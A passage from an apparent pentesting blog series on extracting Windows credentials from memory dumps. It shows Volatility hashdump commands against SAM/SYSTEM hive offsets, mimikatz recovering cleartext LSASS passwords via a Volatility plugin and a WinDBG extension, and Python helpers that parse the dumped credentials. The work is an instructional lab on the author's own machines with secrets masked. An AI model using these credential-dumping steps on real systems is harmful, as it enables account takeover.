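            sessions.append(current)
        if current is None:
            continue
        m = PROVIDER_RE.match(line)
        if m:
            provider = m.group(1)
            current["providers"][provider] = {}     # "KO" providers stay empty
            continue
        m = FIELD_RE.match(line)
        if m and provider:
            current["providers"][provider][m.group(1)] = m.group(2).strip()
            continue
        m = HEADER_RE.match(line)
        if m and not line.startswith(" "):
            current[m.group(1).strip()] = m.group(2).strip()
    return sessions


def exposed_credentials(sessions):
    """(domain, user) -> sorted providers that held a cleartext password.
    "(null)" and empty values are ignored; the duplicate sessions for one
    account seen in the output above collapse into a single entry."""
    exposed = {}
    for s in sessions:
        key = (s.get("Domain", ""), s.get("User Name", ""))
        for name, fields in s["providers"].items():
            password = fields.get("Password", "")
            if password and password != "(null)":
                exposed.setdefault(key, set()).add(name)
    return {k: sorted(v) for k, v in exposed.items()}


if __name__ == "__main__":
    for (domain, user), providers in exposed_credentials(parse_sekurlsa(SEKURLSA)).items():
        print("%s\\%s: cleartext password in %s" % (domain, user, ", ".join(providers)))
```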

Windows Credentials and Memory Dumps – Part 5: Virtualbox & LM/NTLM Hashes

For this part I'm using the standalone version of Volatility for Windows. The goal is dumping LM/NTLM hashes from a Windows memory image.
When you have access to a host where virtual machines are running, but no access to the VMs themselves, one possibility is to reboot a VM from an ISO and reset or steal the password that way. Of course this is very noisy, and for a pentester there are better ways. With VirtualBox you can dump the memory of a VM while it is running.
For this test I am running an old Windows XP SP2 box in VirtualBox. The host system is running Windows 8.1.
Dump the memory:
C:\Program Files\Oracle\VirtualBox>vboxmanage debugvm "WinXP_1" dumpvmcore --filename c:\Users\dax\Downloads\volatility_2.4.win.standalone\test.elf
From here it is the usual steps:
C:\Users\dax\Downloads\volatility_2.4.win.standalone\volatility_2.4.win.standalone>volatility-2.4.standalone.exe imageinfo -f test.elf
Volatility Foundation Volatility Framework 2.4
Determining profile based on KDBG search…
          Suggested Profile(s) : WinXPSP2x86, WinXPSP3x86 (Instantiated with WinXPSP2x86)
                     AS Layer1 : IA32PagedMemory (Kernel AS)
                     AS Layer2 : OSXPmemELF (Unnamed AS)
                     AS Layer3 : FileAddressSpace (C:\Users\dax\Downloads\volatility_2.4.win.standalone\volatility_2.4.win.standalone\test.elf)
                      PAE type : No PAE
                           DTB : 0x39000L
                          KDBG : 0x8054cde0L
          Number of Processors : 1
     Image Type (Service Pack) : 3
                KPCR for CPU 0 : 0xffdff000L
             KUSER_SHARED_DATA : 0xffdf0000L
           Image date and time : 2016-01-22 10:11:07 UTC+0000
     Image local date and time : 2016-01-22 11:11:07 +0100
C:\Users\dax\Downloads\volatility_2.4.win.standalone\volatility_2.4.win.standalone>volatility-2.4.standalone.exe hivelist -f test.elf --profile WinXPSP2x86
Volatility Foundation Volatility Framework 2.4
Virtual    Physical   Name
---------- ---------- ----
0xe1064380 0x043bf380 \??\C:\Dokumente und Einstellungen\x\Lokale Einstellungen\Anwendungsdaten\Microsoft\Windows\UsrClass.dat
0xe1078b60 0x04492b60 \Device\HarddiskVolume1\Dokumente und Einstellungen\x\NTUSER.DAT
0xe1b4bb60 0x1c5c0b60 \Device\HarddiskVolume1\Dokumente und Einstellungen\LocalService\Lokale Einstellungen\Anwendungsdaten\Microsoft\Windows\UsrClass.dat
0xe1ca9b60 0x1c562b60 \Device\HarddiskVolume1\Dokumente und Einstellungen\LocalService\NTUSER.DAT
0xe19f9b60 0x1bf35b60 \Device\HarddiskVolume1\Dokumente und Einstellungen\NetworkService\Lokale Einstellungen\Anwendungsdaten\Microsoft\Windows\UsrClass.dat
0xe19a77b0 0x1bb727b0 \Device\HarddiskVolume1\Dokumente und Einstellungen\NetworkService\NTUSER.DAT
0xe186f008 0x1c113008 \Device\HarddiskVolume1\WINDOWS\system32\config\software
0xe1875b60 0x1c11eb60 \Device\HarddiskVolume1\WINDOWS\system32\config\default
0xe187d008 0x1c135008 \Device\HarddiskVolume1\WINDOWS\system32\config\SAM
0xe186fb60 0x1c113b60 \Device\HarddiskVolume1\WINDOWS\system32\config\SECURITY
0xe13cd008 0x02c2c008 [no name]
0xe1035b60 0x028d2b60 \Device\HarddiskVolume1\WINDOWS\system32\config\system
0xe102e008 0x028cc008 [no name]
For retrieving the hashes, two values from the hivelist above are needed in the next step:
-y = virtual offset of the SYSTEM hive
-s = virtual offset of the SAM hive
C:\Users\dax\Downloads\volatility_2.4.win.standalone\volatility_2.4.win.standalone>volatility-2.4.standalone.exe hashdump -f test.elf --profile WinXPSP2x86 -y 0xe1035b60 -s 0xe187d008
Volatility Foundation Volatility Framework 2.4
Administrator:500:XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX:XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX:::
Gast:501:XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX:XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX:::
Hilfeassistent:1000:XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX:XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX:::
SUPPORT_388945a0:1002:XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX:XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX:::
dax:1003:XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX:XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX:::
x:1004:XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX:XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX:::
Links:

Windows Credentials and Memory Dumps – Part 4: Volatility & Mimikatz

For this test I installed everything in a WinXP VM. I followed these instructions:
… with only small changes, because I had a win32 machine.
First things first: the plugin seems to be a PoC and supports Windows Vista & 7, 32 & 64 bit (maybe it works for Windows Server 2008 too?).
Here are the steps for installing volatility with the plugin:
Download & install Python 2.7.x from https://www.python.org/downloads/release
Download & install Microsoft Visual C++ Compiler for Python 2.7 https://www.microsoft.com/en-us/download/details.aspx?id=44266
(Don't know if that was really necessary)
C:\Python27\Scripts>python.exe -m pip install distorm3
C:\Python27\Scripts>python.exe -m pip install Pycrypto
C:\Python27\Scripts>python.exe -m pip install yara
C:\Python27\Scripts>python.exe -m pip install construct
I downloaded the mimikatz plugin for volatility from:
and stored it in c:\volatility-plugins.
Check:
C:\>python.exe "c:\Python27\Scripts\vol.py" --plugins="c:\volatility-plugins" --info | findstr /i mimi
Volatility Foundation Volatility Framework 2.4
linux_slabinfo             – Mimics /proc/slabinfo on a running machine
mimikatz                   – mimikatz offline
Success…
Then copy the test.elf image from part 1 to the VM.
Now it is possible to fetch the credentials in clear text:
C:\>python "c:\python27\scripts\vol.py" --plugins="c:\volatility-plugins" -f "z:\DAXAMD-20160124-111555.raw"  --profile=Win7SP0x64 mimikatz
Volatility Foundation Volatility Framework 2.4
Module   User             Domain           Password
-------- ---------------- ---------------- ----------------------------------------
wdigest  __vmware_user__  daxamd           XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
wdigest  dax              daxamd           XXXXXXXXXXXXXXXXXX
wdigest  DAXAMD$          WORKGROUP

Memdumps, Volatility, Mimikatz, VMs – Part 3: WinDBG Mimikatz Extension

Now this is interesting: it is possible to load a full memory dump into WinDBG, load the mimikatz extension and dump the credentials in cleartext. For this I used the dump of the Windows 7 machine from part 2.
For this:
– Download & Install WinDBG
– Download MoonSols Windows Memory Toolkit (http://www.moonsols.com/windows-memory-toolkit/)
Convert the memory image:
C:\Users\dax\Downloads\MWMT-v1.4>bin2dmp.exe ..\volatility_2.5.win.standalone\DAXAMD-20160124-111555.raw ..\volatility_2.5.win.standalone\DAXAMD-20160124-111555.dmp
Note: Don't use the Volatility built-in function raw2dmp for this task. This did not work for me.
In WinDBG:
– For x64 dump start WinDBG (x64)
– Open the crashdump
Then:
0: kd> .load c:\users\dax\downloads\mimikatz\x64\mimilib.dll
  .#####.   mimikatz 2.0 alpha (x64) built on Jan 17 2016 00:38:45
 .## ^ ##.  "A La Vie, A L'Amour" - Windows build 7601
 ## / \ ##  /* * *
 ## \ / ##   Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 '## v ##'   http://blog.gentilkiwi.com/mimikatz             (oe.eo)
  '#####'                                  WinDBG extension ! * * */
===================================
#         * Kernel mode *         #
===================================
# Search for LSASS process
0: kd> !process 0 0 lsass.exe
# Then switch to its context
0: kd> .process /r /p <EPROCESS address>
# And finally :
0: kd> !mimikatz
===================================
#          * User mode *          #
===================================
0:000> !mimikatz
===================================
0: kd> .SymFix
0: kd> .Reload
Loading Kernel Symbols
...............................................................
..................................................................
..............................................
Loading User Symbols
...............
Loading unloaded module list
….Unable to enumerate user-mode unloaded modules, NTSTATUS 0xC0000147
Loading Wow64 Symbols
................................................
0: kd> !process 0 0 lsass.exe
PROCESS fffffa80072b2b10
    SessionId: 0  Cid: 01dc    Peb: 7fffffd6000  ParentCid: 0188
    DirBase: 137127000  ObjectTable: fffff8a001159230  HandleCount: 660.
    Image: lsass.exe
0: kd> .process /r /p fffffa80072b2b10
Implicit process is now fffffa80`072b2b10
Loading User Symbols
..................................................................
0: kd> !mimikatz
DPAPI Backup keys
=================
Current prefered key:       {00000000-0000-0000-0000-000000000000}
Compatibility prefered key: {00000000-0000-0000-0000-000000000000}
SekurLSA
========
Authentication Id : 0 ; 835674 (00000000:000cc05a)
Session           : Interactive from 0
User Name         : __vmware_user__
Domain            : daxamd
Logon Server      : DAXAMD
Logon Time        : 24.01.2016 12:09:33
SID               : xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
    msv :
     [00010000] CredentialKeys
     * NTLM     : xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
     * SHA1     : xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
     [00000003] Primary
     * Username : __vmware_user__
     * Domain   : daxamd
     * NTLM     : xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
     * SHA1     : xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
    tspkg : KO
    wdigest :
     * Username : __vmware_user__
     * Domain   : daxamd
     * Password : xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
    kerberos :
     * Username : __vmware_user__
     * Domain   : daxamd
     * Password : (null)
    ssp :
    masterkey :
    credman :
Authentication Id : 0 ; 221616 (00000000:000361b0)
Session           : Interactive from 1
User Name         : dax
Domain            : daxamd
Logon Server      : DAXAMD
Logon Time        : 24.01.2016 12:07:40
SID               : xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
    msv :
     [00000003] Primary
     * Username : dax
     * Domain   : daxamd
     * NTLM     : xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
     * SHA1     : xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
     [00010000] CredentialKeys
     * NTLM     : xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
     * SHA1     : xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
    tspkg : KO
    wdigest :
     * Username : dax
     * Domain   : daxamd
     * Password : xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
    kerberos :
     * Username : dax
     * Domain   : daxamd
     * Password : (null)
— cut —
Again, I found this one awesome.
Links:

Memdumps, Volatility, Mimikatz, VMs – Part 2: Windows 7 Full Memory Dump & Get Hashes

For this part we first make a memory dump with the MoonSols DumpIt.exe tool (using my physical Windows 7 x64 machine).
The next steps are simple volatility calls, like getting the basic image information:
C:\Users\dax\Downloads\volatility_2.5.win.standalone>volatility-2.5.standalone.exe -f DAXAMD-20160124-111555.raw imageinfo
Volatility Foundation Volatility Framework 2.5
INFO    : volatility.debug    : Determining profile based on KDBG search...
          Suggested Profile(s) : Win2008R2SP0x64, Win7SP1x64, Win7SP0x64, Win2008R2SP1x64
                     AS Layer1 : AMD64PagedMemory (Kernel AS)
                     AS Layer2 : FileAddressSpace (C:\Users\dax\Downloads\volatility_2.5.win.standalone\DAXAMD-20160124-111555.raw)
                      PAE type : No PAE
                           DTB : 0x187000L
                          KDBG : 0xf80002ff20f0L
          Number of Processors : 2
     Image Type (Service Pack) : 1
                KPCR for CPU 0 : 0xfffff80002ff3d00L
                KPCR for CPU 1 : 0xfffff880009e8000L
             KUSER_SHARED_DATA : 0xfffff78000000000L
           Image date and time : 2016-01-24 11:16:03 UTC+0000
     Image local date and time : 2016-01-24 12:16:03 +0100
Get the hivelist:
C:\Users\dax\Downloads\volatility_2.5.win.standalone>volatility-2.5.standalone.exe -f DAXAMD-20160124-111555.raw hivelist --profile Win7SP1x64
Volatility Foundation Volatility Framework 2.5
Virtual            Physical           Name
------------------ ------------------ ----
0xfffff8a00000f010 0x0000000153e5d010 [no name]
0xfffff8a0000231f0 0x0000000153e1f1f0 \REGISTRY\MACHINE\SYSTEM
0xfffff8a000062010 0x0000000150d76010 \REGISTRY\MACHINE\HARDWARE
0xfffff8a000121010 0x0000000149c8e010 \SystemRoot\System32\Config\SOFTWARE
0xfffff8a000d55010 0x0000000148258010 \Device\HarddiskVolume1\Boot\BCD
0xfffff8a000e04200 0x000000013b7ad200 \SystemRoot\System32\Config\DEFAULT
0xfffff8a001219010 0x0000000132d35010 \SystemRoot\System32\Config\SECURITY
0xfffff8a001290010 0x0000000131e09010 \SystemRoot\System32\Config\SAM
0xfffff8a00143c010 0x000000012fa23010 \??\C:\Windows\ServiceProfiles\NetworkService\NTUSER.DAT
0xfffff8a00151a240 0x000000012c2b9240 \??\C:\Windows\ServiceProfiles\LocalService\NTUSER.DAT
0xfffff8a002261010 0x000000010db7f010 \??\C:\Users\dax\ntuser.dat
0xfffff8a0022f6410 0x0000000148132410 \??\C:\Users\dax\AppData\Local\Microsoft\Windows\UsrClass.dat
0xfffff8a004e77010 0x0000000110fea010 \??\C:\System Volume Information\Syscache.hve
0xfffff8a00ceae010 0x000000007eeb9010 \??\C:\Windows\System32\config\COMPONENTS
Help!
C:\Users\dax\Downloads\volatility_2.5.win.standalone>volatility-2.5.standalone.exe hashdump -h
Volatility Foundation Volatility Framework 2.5
Usage: Volatility – A memory forensics analysis platform.
Options:
  -h, --help            list all available options and their default values.
                        Default values may be set in the configuration file
                        (/etc/volatilityrc)
  --conf-file=.volatilityrc
                        User based configuration file
  -d, --debug           Debug volatility
  --plugins=PLUGINS     Additional plugin directories to use (semi-colon
                        separated)
  --info                Print information about all registered objects
  --cache-directory=C:\Users\dax/.cache\volatility
                        Directory where cache files are stored
  --cache               Use caching
  --tz=TZ               Sets the (Olson) timezone for displaying timestamps
                        using pytz (if installed) or tzset
  -f FILENAME, --filename=FILENAME
                        Filename to use when opening an image
  --profile=WinXPSP2x86
                        Name of the profile to load (use --info to see a list
                        of supported profiles)
  -l LOCATION, --location=LOCATION
                        A URN location from which to load an address space
  -w, --write           Enable write support
  --dtb=DTB             DTB Address
  --shift=SHIFT         Mac KASLR shift address
  --output=text         Output in this format (support is module specific, see
                        the Module Output Options below)
  --output-file=OUTPUT_FILE
                        Write output in this file
  -v, --verbose         Verbose information
  -g KDBG, --kdbg=KDBG  Specify a KDBG virtual address (Note: for 64-bit
                        Windows 8 and above this is the address of
                        KdCopyDataBlock)
  --force               Force utilization of suspect profile
  -k KPCR, --kpcr=KPCR  Specify a specific KPCR address
  --cookie=COOKIE       Specify the address of nt!ObHeaderCookie (valid for
                        Windows 10 only)
  -y SYS_OFFSET, --sys-offset=SYS_OFFSET
                        SYSTEM hive offset (virtual)
  -s SAM_OFFSET, --sam-offset=SAM_OFFSET
                        SAM hive offset (virtual)
Module Output Options: dot, greptext, html, json, sqlite, text, xlsx
---------------------------------
Module HashDump
---------------------------------
Dumps passwords hashes (LM/NTLM) from memory
What we need for getting the hashes are two values from the hivelist above:
-y = virtual offset of the SYSTEM hive
-s = virtual offset of the SAM hive
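The two offsets can be picked out of the hivelist output automatically instead of by eye. The following Python is an added example, not part of the original post or of Volatility: it parses hivelist text in both the Windows XP style (\Device\HarddiskVolume1\...\config\system) seen in the VirtualBox part above and the Windows 7 style (\REGISTRY\MACHINE\SYSTEM, \SystemRoot\...\SAM) seen here, using constructed sample input copied from those outputs.

```python
# Constructed sample in the layout the Volatility 2 hivelist plugin prints
# (Virtual, Physical, Name); offsets are the ones from the Win7 x64 dump above.
# Console-wrapped hive names must be re-joined before parsing (or run the
# plugin with --output-file so the lines are written unwrapped).
HIVELIST_WIN7 = r"""
Virtual            Physical           Name
------------------ ------------------ ----
0xfffff8a00000f010 0x0000000153e5d010 [no name]
0xfffff8a0000231f0 0x0000000153e1f1f0 \REGISTRY\MACHINE\SYSTEM
0xfffff8a000062010 0x0000000150d76010 \REGISTRY\MACHINE\HARDWARE
0xfffff8a000121010 0x0000000149c8e010 \SystemRoot\System32\Config\SOFTWARE
0xfffff8a001290010 0x0000000131e09010 \SystemRoot\System32\Config\SAM
0xfffff8a004e77010 0x0000000110fea010 \??\C:\System Volume Information\Syscache.hve
"""

# Same for the Windows XP dump: other path style, 32-bit offsets, and a hive
# name containing spaces.
HIVELIST_XP = r"""
0xe1078b60 0x04492b60 \Device\HarddiskVolume1\Dokumente und Einstellungen\x\NTUSER.DAT
0xe187d008 0x1c135008 \Device\HarddiskVolume1\WINDOWS\system32\config\SAM
0xe13cd008 0x02c2c008 [no name]
0xe1035b60 0x028d2b60 \Device\HarddiskVolume1\WINDOWS\system32\config\system
"""


def find_hive_offsets(hivelist_text):
    """Return {'system': <virtual offset>, 'sam': <virtual offset>} as strings."""
    found = {}
    for line in hivelist_text.splitlines():
        # At most three fields: the hive name itself may contain spaces.
        parts = line.split(None, 2)
        if len(parts) != 3 or not parts[0].lower().startswith("0x"):
            continue  # header, separator or blank line
        virt, _phys, name = parts
        if name == "[no name]":
            continue
        # Match on the last path component only, case-insensitively, so both
        # \REGISTRY\MACHINE\SYSTEM and ...\config\system qualify while
        # "system32" and "Syscache.hve" do not.
        base = name.rsplit("\\", 1)[-1].lower()
        if base in ("system", "sam") and base not in found:
            found[base] = virt
    missing = {"system", "sam"} - set(found)
    if missing:
        raise ValueError("hive(s) missing from hivelist output: " + ", ".join(sorted(missing)))
    return found
```

The returned values are exactly what goes after -y and -s in the hashdump command below.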
Dump the hashes:
C:\Users\dax\Downloads\volatility_2.5.win.standalone>volatility-2.5.standalone.exe hashdump -f DAXAMD-20160124-111555.raw --profile Win7SP1x64 -y 0xfffff8a0000231f0 -s 0xfffff8a001290010
Volatility Foundation Volatility Framework 2.5
Administrator:500:XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX:XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX:::
Gast:501:XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX:XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX:::
dax:1001:XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX:XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX:::
HomeGroupUser$:1002:XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX:XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX:::
otto:1007:XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX:XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX:::
__vmware_user__:1015:XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX:XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX:::
UpdatusUser:1016:XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX:XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX:::
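Both hashdump outputs on this page (the XP one from the VirtualBox part and this Win7 one) are in pwdump format, user:RID:LM hash:NT hash:::. As an added example that is not part of the original post, the following Python parses such lines and runs the checks someone reviewing a dumped SAM wants: accounts that still store an LM hash (XP does so by default, Vista and later only when the NoLMHash setting is turned off), accounts with an empty password, and several accounts sharing one NT hash, i.e. one password. The sample lines and their hashes are constructed; only the two "empty" constants are the real, well-known values.

```python
# Constructed pwdump-style lines in the layout the hashdump plugin prints
# (user:RID:LM hash:NT hash:::). The hashes are made-up test values, not the
# ones from the dumps above; only the two "empty" constants below are real.
LM_EMPTY = "aad3b435b51404eeaad3b435b51404ee"  # LM hash of "" = no LM hash stored
NT_EMPTY = "31d6cfe0d16ae931b73c59d7e0c089c0"  # NT hash of an empty password

SAMPLE_HASHDUMP = """\
Administrator:500:0123456789abcdef0123456789abcdef:fedcba9876543210fedcba9876543210:::
Gast:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
dax:1003:aad3b435b51404eeaad3b435b51404ee:00112233445566778899aabbccddeeff:::
x:1004:aad3b435b51404eeaad3b435b51404ee:00112233445566778899aabbccddeeff:::
"""


def parse_pwdump(text):
    """Parse pwdump lines into dicts; skips blank lines and the Volatility banner."""
    rows = []
    for line in text.splitlines():
        fields = line.strip().split(":")
        if len(fields) < 4 or not fields[1].isdigit():
            continue  # blank line or "Volatility Foundation ..." banner
        rows.append({"user": fields[0], "rid": int(fields[1]),
                     "lm": fields[2].lower(), "nt": fields[3].lower()})
    return rows


def audit_hashes(rows):
    """Return sorted (finding, account) pairs for the hygiene problems above."""
    findings = []
    by_nt = {}
    for r in rows:
        if r["lm"] != LM_EMPTY:
            # The legacy LM hash is stored next to the NT hash: NoLMHash is off.
            findings.append(("lm_hash_stored", r["user"]))
        if r["nt"] == NT_EMPTY:
            findings.append(("empty_password", r["user"]))
        else:
            by_nt.setdefault(r["nt"], []).append(r["user"])
    for users in by_nt.values():
        if len(users) > 1:  # identical NT hash means identical password
            findings.append(("shared_password", ",".join(sorted(users))))
    return sorted(findings)
```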
Link: